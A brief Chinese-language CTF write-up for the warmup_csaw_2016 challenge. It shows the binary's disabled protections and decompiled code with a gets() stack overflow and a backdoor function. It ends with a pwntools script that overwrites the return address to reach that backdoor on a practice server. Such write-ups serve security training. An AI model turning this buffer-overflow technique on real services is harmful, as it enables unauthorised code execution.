warmup_csaw_2016
查询文件保护措施
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
64位程序,不能修改GOT表,其他保护都没开,ida分析
存在后门函数
int sub_40060D()
{
return system("cat flag.txt");
}
主函数如下
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-80h]
char v5; // [rsp+40h] [rbp-40h]
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p\n", sub_40060D);
write(1, &s, 9uLL);
write(1, ">", 1uLL);
return gets(&v5, ">");
}
存在栈溢出漏洞,溢出到后门函数即可
from pwn import *
r = remote('node3.buuoj.cn',26140)
fun_addr = 0x40060D
payload = b'a'*0x48+p64(fun_addr)
r.sendline(payload)
r.interactive()